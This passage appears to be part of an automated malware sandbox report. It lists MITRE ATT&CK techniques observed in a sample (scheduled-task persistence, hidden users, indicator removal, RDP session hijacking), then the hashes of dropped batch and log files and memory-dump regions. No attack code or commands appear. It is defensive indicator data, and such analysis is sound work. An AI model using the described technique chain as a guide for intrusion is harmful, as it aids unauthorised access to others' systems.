Scheduled Task

T1053.005

Privilege Escalation

Account Manipulation

T1098

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Users

T1564.002

Indicator Removal

T1070

Network Share Connection Removal

T1070.005

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f849497d958d34c80a1aab260108ca0b

SHA1
0d196e1080ff995b803b6c3d53776eabd946a5d1

SHA256
f3aa9d6f5678cea9bb386deda1e267570fd05fcf906d798d05075b359a0164a2

SHA512
7001ef9c11b30e3c6762ab51b0db3341e4eb177c43834b44c2ff183a8fc8141846d05445754370031ee1bd50e46eb9655035d60fc2375a3fbc17c847bc0eaa23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uyzuhsyu.bxq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\k1.bat

Filesize
1KB

MD5
5c9f358175096711a267c17e746390b0

SHA1
128cd0e49b74583d33f224362b2381686739fea7

SHA256
33675909e13fd3378b390d5bf3fb31b094a291223bf2735fe79e8751d61f2f04

SHA512
5392fd524121d76e43fad750581871589655ec5bba56d875c85e2a884a3d2fc1c11b818131ebde34e402dd436a47188d074959d6b6c8632ff227a5692f212510

Download Submit
C:\Users\Admin\AppData\Local\Temp\k2.bat

Filesize
358B

MD5
73ee484b95ae517d099384e0b5f2255a

SHA1
4b7c89b03aa4c57267e041b3a8356bdd5490b2aa

SHA256
fb26e69770508af54bb2755f916859f2c912eaae7b8fe83f163f4450b3f34e92

SHA512
d84cb995fcbe214efa1bd9e236dfc3b9530780aa670ad30b5156d62b1659745dd8d6fbe438297aed58517a2fa1bcb987f203c100bb3477cf7efe4f867a8a342d

Download Submit
C:\Users\Admin\AppData\Local\Temp\scheduler-once.bat

Filesize
758B

MD5
fb201872c7fe90f79e250805f0b9f998

SHA1
e79d432eb71986227814e9b3de4a42d1df1aa418

SHA256
75c075cf9d9a7dba88a2ad74df1dd6f92c4033063eac3f66034831a1a049f1ef

SHA512
9927f60456f285b94e8349bc2f1d5c1f145c8ea590fa2d180108bc0f8872b7640ec15cf6837c1458c557b9b9ad325f5787385ab3687d5ff407110c67a57ccff4

Download Submit
C:\Users\Public\documents\id.log

Filesize
78B

MD5
38b47d8996de2cd2c55e8849cbd6e468

SHA1
d8e81ec2403281571de71e9ee0c31cee612d0f4a

SHA256
ca81569abcf3ad6aa5e1ce316e29ea43a5b2aec896e0bbdfc684bf55cb36c3d1

SHA512
fb073d85d166bc0095369a190f74e42553aea5f2dca054e4b3f66aa4d8035e910d00f0cccd672692e4c9d28d046de75cd8e2712db5c7b5577c2d6ef24caa64dd

Download Submit
C:\Windows\Temp\OneDriveLog\OneDrive.log

Filesize
3KB

MD5
2a25e7af8156ae7d6b315eae75bf0f15

SHA1
ade8a96acdc06fbaac97807b2a6cdfdc85d3f706

SHA256
da71bb6bf1d5cc9f9e22c15f936b5a3d2e7c04c4e30223877ce7e881745e563a

SHA512
719933780b8a660df8050aa39e044fbefe9771ce14c468d63eee5d2e9168974897834315fc4aa8dbf3a1a05269fbe626e38048505a213e6b4b895ce1b86750de

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
memory/1160-14-0x00007FF8AC370000-0x00007FF8ACE31000-memory.dmp

Filesize
10.8MB

Download
memory/1160-146-0x00007FF8AC370000-0x00007FF8ACE31000-memory.dmp

Filesize
10.8MB

Download
memory/1160-48-0x00000194AAF90000-0x00000194AB19A000-memory.dmp

Filesize
2.0MB

Download
memory/1160-49-0x00007FF8AC370000-0x00007FF8ACE31000-memory.dmp

Filesize
10.8MB

Download
memory/1160-1-0x000001948FE50000-0x000001948FE72000-memory.dmp

Filesize
136KB

Download
memory/1160-12-0x00007FF8AC370000-0x00007FF8ACE31000-memory.dmp

Filesize
10.8MB

Download
memory/1160-68-0x00007FF8AC373000-0x00007FF8AC375000-memory.dmp

Filesize
8KB

Download
memory/1160-47-0x00000194AAC00000-0x00000194AAD76000-memory.dmp

Filesize
1.5MB

Download
memory/1160-80-0x00007FF8AC370000-0x00007FF8ACE31000-memory.dmp

Filesize
10.8MB

Download
memory/1160-134-0x00007FF8AC370000-0x00007FF8ACE31000-memory.dmp

Filesize
10.8MB

Download
memory/1160-0-0x00007FF8AC373000-0x00007FF8AC375000-memory.dmp

Filesize
8KB

Download
memory/1160-11-0x00007FF8AC370000-0x00007FF8ACE31000-memory.dmp

Filesize
10.8MB

Download
memory/2608-25-0x00007FF8AC370000-0x00007FF8ACE31000-memory.dmp

Filesize
10.8MB

Download
memory/2608-27-0x00007FF8AC370000-0x00007FF8ACE31000-memory.dmp

Filesize
10.8MB

Download
memory/2608-15-0x00007FF8AC370000-0x00007FF8ACE31000-memory.dmp

Filesize
10.8MB

Download
memory/2608-31-0x00007FF8AC370000-0x00007FF8ACE31000-memory.dmp

Filesize
10.8MB

Download
memory/4104-113-0x000001B2C44A0000-0x000001B2C44C4000-memory.dmp

Filesize
144KB

Download
memory/4104-112-0x000001B2C44A0000-0x000001B2C44CA000-memory.dmp

Filesize
168KB

Download
memory/5012-97-0x000002034D0B0000-0x000002034D0B6000-memory.dmp

Filesize
24KB

Download
memory/5012-95-0x000002034D0D0000-0x000002034D0EA000-memory.dmp

Filesize
104KB

Download
memory/5012-98-0x000002034D0C0000-0x000002034D0CA000-memory.dmp

Filesize
40KB

Download
memory/5012-92-0x000002034CE40000-0x000002034CE4A000-memory.dmp

Filesize
40KB

Download
memory/5012-90-0x000002034CE50000-0x000002034CE6C000-memory.dmp

Filesize
112KB

Download
memory/5012-96-0x000002034D080000-0x000002034D088000-memory.dmp

Filesize
32KB

Download
memory/5012-94-0x000002034D070000-0x000002034D07A000-memory.dmp

Filesize
40KB

Download
memory/5012-91-0x000002034CE70000-0x000002034CF25000-memory.dmp

Filesize
724KB

Download
memory/5012-93-0x000002034D090000-0x000002034D0AC000-memory.dmp

Filesize
112KB

Download
memory/5108-126-0x000001A4F6140000-0x000001A4F61F5000-memory.dmp

Filesize
724KB

Download